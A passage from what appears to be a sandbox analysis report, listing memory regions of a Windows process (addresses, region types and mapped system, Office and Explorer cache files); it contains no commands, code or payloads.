mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 485 start_va = 0x2860000 end_va = 0x28a7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002860000" filename = "" Region: id = 486 start_va = 0x28b0000 end_va = 0x28b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028b0000" filename = "" Region: id = 487 start_va = 0x28d0000 end_va = 0x28d1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 488 start_va = 0x28e0000 end_va = 0x28e0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 489 start_va = 0x28f0000 end_va = 0x28fdfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028f0000" filename = "" Region: id = 490 start_va = 0x2930000 end_va = 0x2930fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 491 start_va = 0x2960000 end_va = 0x29dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002960000" filename = "" Region: id = 492 start_va = 0x29e0000 end_va = 0x2a9bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000029e0000" filename = "" Region: id = 493 start_va = 0x2aa0000 end_va = 0x2b9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002aa0000" filename = "" Region: id = 494 start_va = 0x2ba0000 end_va = 0x3bdffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 495 start_va = 0x3be0000 end_va = 0x3be0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003be0000" filename = "" Region: id = 496 start_va = 0x3bf0000 end_va = 0x3bf1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003bf0000" filename = "" Region: id = 497 start_va = 0x3c00000 end_va = 0x3c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 498 start_va = 0x3c80000 end_va = 0x3c81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c80000" filename = "" Region: id = 499 start_va = 0x3c90000 end_va = 0x3c90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c90000" filename = "" Region: id = 500 start_va = 0x3ca0000 end_va = 0x3ca0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ca0000" filename = "" Region: id = 501 start_va = 0x3cb0000 end_va = 0x3cb0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_256.db") Region: id = 502 start_va = 0x3cc0000 end_va = 0x3dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cc0000" filename = "" Region: id = 503 start_va = 0x3dc0000 end_va = 0x3dc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003dc0000" filename = "" Region: id = 504 start_va = 0x3dd0000 end_va = 0x3ddffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003dd0000" filename = "" Region: id = 505 start_va = 0x3de0000 end_va = 0x3deffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003de0000" filename = "" Region: id = 506 start_va = 0x3df0000 end_va = 0x3dfffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003df0000" filename = "" Region: id = 507 start_va = 0x3e00000 end_va = 0x3e00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 508 start_va = 0x3e10000 end_va = 0x3e10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e10000" filename = "" Region: id = 509 start_va = 0x3e20000 end_va = 0x3e20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e20000" filename = "" Region: id = 510 start_va = 0x3e30000 end_va = 0x3e33fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 511 start_va = 0x3e40000 end_va = 0x3e40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e40000" filename = "" Region: id = 512 start_va = 0x3e50000 end_va = 0x3e50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e50000" filename = "" Region: id = 513 start_va = 0x3e60000 end_va = 0x3e60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 514 start_va = 0x3e70000 end_va = 0x3e71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e70000" filename = "" Region: id = 515 start_va = 0x3e80000 end_va = 0x3eb8fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e80000" filename = "" Region: id = 516 start_va = 0x3ec0000 end_va = 0x3ec0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ec0000" filename = "" Region: id = 517 start_va = 0x3ed0000 end_va = 0x3ed0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 518 start_va = 0x3ee0000 end_va = 0x3ee1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ee0000" filename = "" Region: id = 519 start_va = 0x3f00000 end_va = 0x3f01fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 520 start_va = 0x3f50000 end_va = 0x3f51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f50000" filename = "" Region: id = 521 start_va = 0x3f60000 end_va = 0x3f63fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 522 start_va = 0x3f70000 end_va = 0x3fb4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 523 start_va = 0x3fc0000 end_va = 0x3fc3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 524 start_va = 0x3fd0000 end_va = 0x405dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 525 start_va = 0x4060000 end_va = 0x40dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004060000" filename = "" Region: id = 526 start_va = 0x40e0000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 527 start_va = 0x4160000 end_va = 0x41dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004160000" filename = "" Region: id = 528 start_va = 0x41e0000 end_va = 0x41e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 529 start_va = 0x41f0000 end_va = 0x41f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041f0000" filename = "" Region: id = 530 start_va = 0x4200000 end_va = 0x4200fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 531 start_va = 0x4210000 end_va = 0x4210fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004210000" filename = "" Region: id = 532 start_va = 0x4220000 end_va = 0x4228fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004220000" filename = "" Region: id = 533 start_va = 0x4230000 end_va = 0x4233fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 534 start_va = 0x4240000 end_va = 0x4241fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004240000" filename = "" Region: id = 535 start_va = 0x4250000 end_va = 0x4250fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 536 start_va = 0x4260000 end_va = 0x4268fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004260000" filename = "" Region: id = 537 start_va = 0x4270000 end_va = 0x42effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004270000" filename = "" Region: id = 538 start_va = 0x42f0000 end_va = 0x42fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000042f0000" filename = "" Region: id = 539 start_va = 0x4300000 end_va = 0x4300fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004300000" filename = "" Region: id = 540 start_va = 0x4340000 end_va = 0x4341fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004340000" filename = "" Region: id = 541 start_va = 0x4350000 end_va = 0x4367fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000d.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x000000000000000d.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000d.db") Region: id = 542 start_va = 0x4370000 end_va = 0x43effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004370000" filename = "" Region: id = 543 start_va = 0x43f0000 end_va = 0x446ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000043f0000" filename = "" Region: id = 544 start_va = 0x4470000 end_va = 0x4961fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004470000" filename = "" Region: id = 545 start_va = 0x4970000 end_va = 0x4971fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004970000" filename = "" Region: id = 546 start_va = 0x4980000 end_va = 0x4981fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "inputswitch.dll.mui" filename = "\\Windows\\System32\\en-US\\InputSwitch.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\inputswitch.dll.mui") Region: id = 547 start_va = 0x4990000 end_va = 0x4d8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004990000" filename = "" Region: id = 548 start_va = 0x4d90000 end_va = 0x4d90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d90000" filename = "" Region: id = 549 start_va = 0x4da0000 end_va = 0x4da1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004da0000" filename = "" Region: id = 550 start_va = 0x4db0000 end_va = 0x4db1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004db0000" filename = "" Region: id = 551 start_va = 0x4dc0000 end_va = 0x4dc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004dc0000" filename = "" Region: id = 552 start_va = 0x4dd0000 end_va = 0x4dd3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 553 start_va = 0x4df0000 end_va = 0x4df2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004df0000" filename = "" Region: id = 554 start_va = 0x4e00000 end_va = 0x4e00fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{5c9e180f-34bb-4f92-8676-68c88e410c2b}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{5C9E180F-34BB-4F92-8676-68C88E410C2B}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{5c9e180f-34bb-4f92-8676-68c88e410c2b}.2.ver0x0000000000000001.db") Region: id = 555 start_va = 0x4e10000 end_va = 0x4e13fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 556 start_va = 0x4e20000 end_va = 0x4e20fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{0fa68fff-8d1f-4fcc-b2fc-0c8384cf8d69}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{0FA68FFF-8D1F-4FCC-B2FC-0C8384CF8D69}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{0fa68fff-8d1f-4fcc-b2fc-0c8384cf8d69}.2.ver0x0000000000000001.db") Region: id = 557 start_va = 0x4e30000 end_va = 0x4e31fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 558 start_va = 0x4e50000 end_va = 0x4e51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e50000" filename = "" Region: id = 559 start_va = 0x4e60000 end_va = 0x4e61fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e60000" filename = "" Region: id = 560 start_va = 0x4e70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e70000" filename = "" Region: id = 561 start_va = 0x4f70000 end_va = 0x4f73fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 562 start_va = 0x4f80000 end_va = 0x4f80fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3ec13d2a-c75f-4a0a-9855-0b415d40999c}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{3EC13D2A-C75F-4A0A-9855-0B415D40999C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{3ec13d2a-c75f-4a0a-9855-0b415d40999c}.2.ver0x0000000000000001.db") Region: id = 563 start_va = 0x4fa0000 end_va = 0x4fa4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 564 start_va = 0x4fb0000 end_va = 0x4fbffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 565 start_va = 0x4ff0000 end_va = 0x4ff0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ff0000" filename = "" Region: id = 566 start_va = 0x5000000 end_va = 0x50fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 567 start_va = 0x5100000 end_va = 0x5101fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005100000" filename = "" Region: id = 568 start_va = 0x5110000 end_va = 0x5157fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005110000" filename = "" Region: id = 569 start_va = 0x5170000 end_va = 0x5170fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005170000" filename = "" Region: id = 570 start_va = 0x5180000 end_va = 0x5181fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005180000" filename = "" Region: id = 571 start_va = 0x5190000 end_va = 0x5191fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005190000" filename = "" Region: id = 572 start_va = 0x51a0000 end_va = 0x51a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000051a0000" filename = "" Region: id = 573 start_va = 0x51b0000 end_va = 0x51b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Region: id = 574 start_va = 0x51e0000 end_va = 0x51e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000051e0000" filename = "" Region: id = 575 start_va = 0x51f0000 end_va = 0x5237fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051f0000" filename = "" Region: id = 576 start_va = 0x52c0000 end_va = 0x5478fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 577 start_va = 0x5480000 end_va = 0x54fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005480000" filename = "" Region: id = 578 start_va = 0x5500000 end_va = 0x557ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005500000" filename = "" Region: id = 579 start_va = 0x5580000 end_va = 0x5d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005580000" filename = "" Region: id = 580 start_va = 0x5d80000 end_va = 0x5dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d80000" filename = "" Region: id = 581 start_va = 0x5e00000 end_va = 0x5e48fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e00000" filename = "" Region: id = 582 start_va = 0x5e50000 end_va = 0x81d1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "appdb.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Notifications\\appdb.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\notifications\\appdb.dat") Region: id = 583 start_va = 0x81f0000 end_va = 0x81f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000081f0000" filename = "" Region: id = 584 start_va = 0x8200000 end_va = 0x8200fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008200000" filename = "" Region: id = 585 start_va = 0x8210000 end_va = 0x8210fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008210000" filename = "" Region: id = 586 start_va = 0x8220000 end_va = 0x8221fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008220000" filename = "" Region: id = 587 start_va = 0x8230000 end_va = 0x8231fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008230000" filename = "" Region: id = 588 start_va = 0x8240000 end_va = 0x8241fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008240000" filename = "" Region: id = 589 start_va = 0x8250000 end_va = 0x8251fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008250000" filename = "" Region: id = 590 start_va = 0x8260000 end_va = 0x837cfff monitored = 0 entry_point = 0x8261cc0 region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 591 start_va = 0x8460000 end_va = 0x865ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008460000" filename = "" Region: id = 592 start_va = 0x8660000 end_va = 0x875ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 593 start_va = 0x8760000 end_va = 0x895ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008760000" filename = "" Region: id = 594 start_va = 0x89e0000 end_va = 0x8a5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000089e0000" filename = "" Region: id = 595 start_va = 0x8a60000 end_va = 0x8adffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008a60000" filename = "" Region: id = 596 start_va = 0x8b60000 end_va = 0x8bdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008b60000" filename = "" Region: id = 597 start_va = 0x8c60000 end_va = 0x8cdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008c60000" filename = "" Region: id = 598 start_va = 0x8d60000 end_va = 0x8ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008d60000" filename = "" Region: id = 599 start_va = 0x8de0000 end_va = 0x8e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008de0000" filename = "" Region: id = 600 start_va = 0x8e60000 end_va = 0x8edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008e60000" filename = "" Region: id = 601 start_va = 0x8ee0000 end_va = 0x8fdffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 602 start_va = 0x8fe0000 end_va = 0x90dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 603 start_va = 0x90e0000 end_va = 0x9267fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ieframe.dll.mui" filename = "\\Windows\\System32\\en-US\\ieframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\ieframe.dll.mui") Region: id = 604 start_va = 0x92e0000 end_va = 0x935ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000092e0000" filename = "" Region: id = 605 start_va = 0x9360000 end_va = 0x945ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 606 start_va = 0x9460000 end_va = 0x955ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 607 start_va = 0x9560000 end_va = 0x95dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009560000" filename = "" Region: id = 608 start_va = 0x95e0000 end_va = 0x965ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000095e0000" filename = "" Region: id = 609 start_va = 0x9660000 end_va = 0x975ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 610 start_va = 0x9760000 end_va = 0x97dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009760000" filename = "" Region: id = 611 start_va = 0x97e0000 end_va = 0x98dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_32.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_32.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_32.db") Region: id = 612 start_va = 0x98e0000 end_va = 0x99dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_16.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_16.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_16.db") Region: id = 613 start_va = 0x9a10000 end_va = 0x9a10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a10000" filename = "" Region: id = 614 start_va = 0x9a20000 end_va = 0x9f11fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a20000" filename = "" Region: id = 615 start_va = 0x9f20000 end_va = 0xa21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f20000" filename = "" Region: id = 616 start_va = 0xa220000 end_va = 0xa31ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 617 start_va = 0xa320000 end_va = 0xa41ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 618 start_va = 0xa460000 end_va = 0xa4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a460000" filename = "" Region: id = 619 start_va = 0xa4e0000 end_va = 0xa55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a4e0000" filename = "" Region: id = 620 start_va = 0xa560000 end_va = 0xa5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a560000" filename = "" Region: id = 621 start_va = 0xa5e0000 end_va = 0xa6dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 622 start_va = 0xa7e0000 end_va = 0xa85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a7e0000" filename = "" Region: id = 623 